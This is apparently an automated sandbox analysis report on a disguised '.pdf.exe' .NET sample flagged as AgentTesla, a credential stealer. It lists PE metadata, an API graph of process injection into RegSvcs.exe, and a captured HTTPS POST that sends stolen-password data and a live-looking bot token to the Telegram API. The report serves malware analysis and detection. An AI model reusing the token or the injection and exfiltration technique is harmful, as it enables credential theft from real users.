                                                                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):7.224593030373487
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                              File name:20220114080343434.pdf.exe
                                                                                                              File size:589824
                                                                                                              MD5:cd9290d22bb18ced32a1b81814888382
                                                                                                              SHA1:83b1ce896dca71d611232fe4197cbe3993cccf64
                                                                                                              SHA256:3876b600bafaaaf0a580e3925b9851c1c82ea16b40fb6b2b127296a523cf86fd
                                                                                                              SHA512:1c2c1b126910aad08d6434ed65c49d10e24c3fa79463ec7829ebc6dc4f3601020edaa0d07e7a60c12faec39c557ae4ecafe5804ac324231ff8cf3f4d8d8e7b23
                                                                                                              SSDEEP:12288:SccK777777777777N7cPGR72wUjuf/R9nkIE9NciKpSj1kv6e:CK777777777777lcudvUjuX7S+8kv
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5O.a............................>.... ... ....@.. .......................`............@................................

                                                                                                              File Icon

                                                                                                              Icon Hash:00828e8e8686b000

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x49143e
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                              Time Stamp:0x61E14F35 [Fri Jan 14 10:23:49 2022 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:v4.0.30319
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x913f00x4b.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x920000x5e4.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x940000xc.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x913a50x1c.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x20000x8f4440x8f600False0.755026700087data7.23442041847IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0x920000x5e40x600False0.439453125data4.1825921697IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x940000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                              RT_VERSION0x920a00x356data
                                                                                                              RT_MANIFEST0x923f80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              mscoree.dll_CorExeMain

                                                                                                              Version Infos

                                                                                                              DescriptionData
                                                                                                              Translation0x0000 0x04b0
                                                                                                              LegalCopyright2022 Tradewell
                                                                                                              Assembly Version22.0.0.0
                                                                                                              InternalNameWellKnownSidTy.exe
                                                                                                              FileVersion1.1.0.0
                                                                                                              CompanyNameTradewell ltd
                                                                                                              LegalTrademarks
                                                                                                              CommentsPurple Org
                                                                                                              ProductNameBlaster
                                                                                                              ProductVersion1.1.0.0
                                                                                                              FileDescriptionBlaster
                                                                                                              OriginalFilenameWellKnownSidTy.exe

                                                                                                              Network Behavior

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 14, 2022 13:55:40.908617020 CET49830443192.168.2.3149.154.167.220
                                                                                                              Jan 14, 2022 13:55:40.908689022 CET44349830149.154.167.220192.168.2.3
                                                                                                              Jan 14, 2022 13:55:40.908845901 CET49830443192.168.2.3149.154.167.220
                                                                                                              Jan 14, 2022 13:55:40.955703020 CET49830443192.168.2.3149.154.167.220
                                                                                                              Jan 14, 2022 13:55:40.955754042 CET44349830149.154.167.220192.168.2.3
                                                                                                              Jan 14, 2022 13:55:41.027682066 CET44349830149.154.167.220192.168.2.3
                                                                                                              Jan 14, 2022 13:55:41.027829885 CET49830443192.168.2.3149.154.167.220
                                                                                                              Jan 14, 2022 13:55:41.034490108 CET49830443192.168.2.3149.154.167.220
                                                                                                              Jan 14, 2022 13:55:41.034508944 CET44349830149.154.167.220192.168.2.3
                                                                                                              Jan 14, 2022 13:55:41.034826040 CET44349830149.154.167.220192.168.2.3
                                                                                                              Jan 14, 2022 13:55:41.080782890 CET49830443192.168.2.3149.154.167.220
                                                                                                              Jan 14, 2022 13:55:41.476592064 CET49830443192.168.2.3149.154.167.220
                                                                                                              Jan 14, 2022 13:55:41.503665924 CET44349830149.154.167.220192.168.2.3
                                                                                                              Jan 14, 2022 13:55:41.507227898 CET49830443192.168.2.3149.154.167.220
                                                                                                              Jan 14, 2022 13:55:41.553879976 CET44349830149.154.167.220192.168.2.3
                                                                                                              Jan 14, 2022 13:55:41.586333036 CET44349830149.154.167.220192.168.2.3
                                                                                                              Jan 14, 2022 13:55:41.586447954 CET44349830149.154.167.220192.168.2.3
                                                                                                              Jan 14, 2022 13:55:41.586533070 CET49830443192.168.2.3149.154.167.220
                                                                                                              Jan 14, 2022 13:55:41.589318037 CET49830443192.168.2.3149.154.167.220

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 14, 2022 13:55:40.857312918 CET6035253192.168.2.38.8.8.8
                                                                                                              Jan 14, 2022 13:55:40.877934933 CET53603528.8.8.8192.168.2.3

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Jan 14, 2022 13:55:40.857312918 CET192.168.2.38.8.8.80x29a1Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Jan 14, 2022 13:55:40.877934933 CET8.8.8.8192.168.2.30x29a1No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • api.telegram.org

                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.349830149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2022-01-14 12:55:41 UTC0OUTPOST /bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary=---------------------------8d9d77ee3312256
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1009
                                                                                                              Expect: 100-continue
                                                                                                              Connection: Keep-Alive
                                                                                                              2022-01-14 12:55:41 UTC0INHTTP/1.1 100 Continue
                                                                                                              2022-01-14 12:55:41 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 64 37 37 65 65 33 33 31 32 32 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 32 31 32 34 37 39 38 37 37 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 64 37 37 65 65 33 33 31 32 32 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 68 61 72 64 7a 2f 31 32 33 37 31 36 0a 4f 53 46 75 6c 6c
                                                                                                              Data Ascii: -----------------------------8d9d77ee3312256Content-Disposition: form-data; name="chat_id"2124798776-----------------------------8d9d77ee3312256Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/123716OSFull
                                                                                                              2022-01-14 12:55:41 UTC1INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 14 Jan 2022 12:55:41 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 631
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              {"ok":true,"result":{"message_id":971,"from":{"id":2122434962,"is_bot":true,"first_name":"w4kejohn","username":"w4kejohnbot"},"chat":{"id":2124798776,"first_name":"John","last_name":"Cena","username":"joebest123","type":"private"},"date":1642164941,"document":{"file_name":"user-123716 2022-01-14 04-56-56.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIDy2Hhcs1UJByddqGIFcm3-QKtM09yAAJlCgACftAQU3yvjxPnf62JIwQ","file_unique_id":"AgADZQoAAn7QEFM","file_size":439},"caption":"New PW Recovered!\n\nUser Name: user/123716\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Start time:13:53:52
                                                                                                              Start date:14/01/2022
                                                                                                              Path:C:\Users\user\Desktop\20220114080343434.pdf.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\20220114080343434.pdf.exe"
                                                                                                              Imagebase:0x870000
                                                                                                              File size:589824 bytes
                                                                                                              MD5 hash:CD9290D22BB18CED32A1B81814888382
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              Reputation:low

                                                                                                              General

                                                                                                              Start time:13:54:03
                                                                                                              Start date:14/01/2022
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              Imagebase:0xb0000
                                                                                                              File size:45152 bytes
                                                                                                              MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:13:54:04
                                                                                                              Start date:14/01/2022
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                              Imagebase:0xf80000
                                                                                                              File size:45152 bytes
                                                                                                              MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.309593341.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.309593341.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.557166211.00000000036A7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.309117965.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.309117965.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:9%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:223
                                                                                                                Total number of Limit Nodes:15

                                                                                                                Graph

                                                                                                                execution_graph 21567 1389b98 21571 1389c90 21567->21571 21580 1389c80 21567->21580 21568 1389ba7 21589 1387974 21571->21589 21574 1389cb3 21575 1389cbb 21574->21575 21576 1389eb8 GetModuleHandleW 21574->21576 21575->21568 21577 1389ee5 21576->21577 21577->21568 21581 1389ca3 21580->21581 21582 1387974 GetModuleHandleW 21580->21582 21583 1389cbb 21581->21583 21587 1389f18 2 API calls 21581->21587 21588 1389f08 2 API calls 21581->21588 21582->21581 21583->21568 21584 1389eb8 GetModuleHandleW 21586 1389ee5 21584->21586 21585 1389cb3 21585->21583 21585->21584 21586->21568 21587->21585 21588->21585 21590 1389e70 GetModuleHandleW 21589->21590 21592 1389ca3 21590->21592 21592->21575 21593 1389f08 21592->21593 21598 1389f18 21592->21598 21594 1387974 GetModuleHandleW 21593->21594 21595 1389f2c 21593->21595 21594->21595 21596 1389f51 21595->21596 21603 1389000 21595->21603 21596->21574 21599 1387974 GetModuleHandleW 21598->21599 21600 1389f2c 21599->21600 21601 1389000 LoadLibraryExW 21600->21601 21602 1389f51 21600->21602 21601->21602 21602->21574 21604 138a0f8 LoadLibraryExW 21603->21604 21606 138a171 21604->21606 21606->21596 21607 7447700 21609 7447722 21607->21609 21608 7447a5f 21609->21608 21612 74488e0 21609->21612 21617 74488de 21609->21617 21613 74488fd 21612->21613 21622 7448d1f 21613->21622 21633 7448d30 21613->21633 21614 744893d 21614->21609 21618 74488fd 21617->21618 21620 7448d30 12 API calls 21618->21620 21621 7448d1f 12 API calls 21618->21621 21619 744893d 21619->21609 21620->21619 21621->21619 21623 7448d4a 21622->21623 21624 7448d78 21623->21624 21644 7448ecb 21623->21644 21649 744944a 21623->21649 21653 744959a 21623->21653 21664 744965a 21623->21664 21673 7449332 21623->21673 21678 7449211 21623->21678 21683 7449510 21623->21683 21688 74492e7 21623->21688 21624->21614 21634 7448d4a 21633->21634 21635 74492e7 2 API calls 21634->21635 21636 7449510 2 API calls 21634->21636 21637 7449211 2 API calls 21634->21637 21638 7449332 2 API calls 21634->21638 21639 7448d78 21634->21639 21640 744965a 4 API calls 21634->21640 21641 744959a 6 API calls 21634->21641 21642 744944a 2 API calls 21634->21642 21643 7448ecb 2 API calls 21634->21643 21635->21639 21636->21639 21637->21639 21638->21639 21639->21614 21640->21639 21641->21639 21642->21639 21643->21639 21645 7448edb 21644->21645 21692 7447378 21645->21692 21696 744736c 21645->21696 21700 7449c90 21649->21700 21705 7449ca0 21649->21705 21650 744946b 21718 7446f52 21653->21718 21722 7446f58 21653->21722 21654 74495b4 21726 7446ea8 21654->21726 21730 7446ea2 21654->21730 21655 744969e 21656 7449999 21655->21656 21734 74470f0 21655->21734 21738 74470e8 21655->21738 21656->21624 21657 74497a8 21665 7449663 21664->21665 21671 7446ea2 ResumeThread 21665->21671 21672 7446ea8 ResumeThread 21665->21672 21666 7449999 21666->21624 21667 744969e 21667->21666 21669 74470f0 WriteProcessMemory 21667->21669 21670 74470e8 WriteProcessMemory 21667->21670 21668 74497a8 21669->21668 21670->21668 21671->21667 21672->21667 21674 744933b 21673->21674 21675 744900a 21674->21675 21676 7446f52 SetThreadContext 21674->21676 21677 7446f58 SetThreadContext 21674->21677 21676->21675 21677->21675 21679 744922a 21678->21679 21681 74470f0 WriteProcessMemory 21679->21681 21682 74470e8 WriteProcessMemory 21679->21682 21680 7449271 21680->21624 21680->21680 21681->21680 21682->21680 21684 7449532 21683->21684 21685 7449570 21683->21685 21686 74470f0 WriteProcessMemory 21684->21686 21687 74470e8 WriteProcessMemory 21684->21687 21686->21685 21687->21685 21742 74471e0 21688->21742 21746 74471d8 21688->21746 21689 7449309 21693 7447401 CreateProcessA 21692->21693 21695 74475c3 21693->21695 21695->21695 21697 7447401 CreateProcessA 21696->21697 21699 74475c3 21697->21699 21699->21699 21701 7449cba 21700->21701 21710 7447030 21701->21710 21714 7447028 21701->21714 21702 7449cf5 21702->21650 21706 7449cba 21705->21706 21708 7447030 VirtualAllocEx 21706->21708 21709 7447028 VirtualAllocEx 21706->21709 21707 7449cf5 21707->21650 21708->21707 21709->21707 21711 744705e VirtualAllocEx 21710->21711 21713 74470ad 21711->21713 21713->21702 21715 744702b VirtualAllocEx 21714->21715 21717 74470ad 21715->21717 21717->21702 21719 7446f46 21718->21719 21719->21718 21720 7446fbd SetThreadContext 21719->21720 21721 7446fe5 21720->21721 21721->21654 21723 7446f9d SetThreadContext 21722->21723 21725 7446fe5 21723->21725 21725->21654 21727 7446ee8 ResumeThread 21726->21727 21729 7446f19 21727->21729 21729->21655 21731 7446ea9 ResumeThread 21730->21731 21733 7446f19 21731->21733 21733->21655 21735 7447138 WriteProcessMemory 21734->21735 21737 744718f 21735->21737 21737->21657 21739 7447138 WriteProcessMemory 21738->21739 21741 744718f 21739->21741 21741->21657 21743 744722b ReadProcessMemory 21742->21743 21745 744726f 21743->21745 21745->21689 21747 744722b ReadProcessMemory 21746->21747 21749 744726f 21747->21749 21749->21689 21750 138bf90 21751 138bff6 21750->21751 21755 138c150 21751->21755 21758 138c141 21751->21758 21752 138c0a5 21761 138a9b4 21755->21761 21759 138c17e 21758->21759 21760 138a9b4 DuplicateHandle 21758->21760 21759->21752 21760->21759 21762 138c1b8 DuplicateHandle 21761->21762 21763 138c17e 21762->21763 21763->21752 21764 13840d0 21767 13840ec 21764->21767 21765 138419e 21767->21765 21769 1383898 21767->21769 21773 13842b8 21767->21773 21770 13838a3 21769->21770 21771 138721f 21770->21771 21778 1386d1c 21770->21778 21771->21767 21774 13842dd 21773->21774 21841 13843b8 21774->21841 21845 13843a9 21774->21845 21779 1386d27 21778->21779 21782 1386d3c 21779->21782 21781 1387325 21781->21770 21783 1386d47 21782->21783 21786 1386d6c 21783->21786 21785 1387402 21785->21781 21787 1386d77 21786->21787 21790 1386d9c 21787->21790 21789 1387502 21789->21785 21791 1386da7 21790->21791 21792 1387c5c 21791->21792 21795 138bcb8 21791->21795 21800 138bcc8 21791->21800 21792->21789 21796 138bce9 21795->21796 21797 138bd0d 21796->21797 21805 138be78 21796->21805 21809 138be69 21796->21809 21797->21792 21801 138bce9 21800->21801 21802 138be78 3 API calls 21801->21802 21803 138bd0d 21801->21803 21804 138be69 3 API calls 21801->21804 21802->21803 21803->21792 21804->21803 21808 138be85 21805->21808 21806 138bebf 21806->21797 21808->21806 21813 138a92c 21808->21813 21810 138be78 21809->21810 21811 138bebf 21810->21811 21812 138a92c 3 API calls 21810->21812 21811->21797 21812->21811 21814 138a937 21813->21814 21816 138cbb8 21814->21816 21817 138c754 21814->21817 21816->21816 21818 138c75f 21817->21818 21819 1386d9c 3 API calls 21818->21819 21820 138cc27 21819->21820 21824 138e998 21820->21824 21832 138e9a8 21820->21832 21821 138cc60 21821->21816 21825 138e9a8 21824->21825 21826 138e9e5 21825->21826 21828 138ee28 GetModuleHandleW LoadLibraryExW GetModuleHandleW 21825->21828 21829 138ee17 GetModuleHandleW LoadLibraryExW GetModuleHandleW 21825->21829 21826->21821 21827 138ea25 21830 138f7f0 GetModuleHandleW 21827->21830 21831 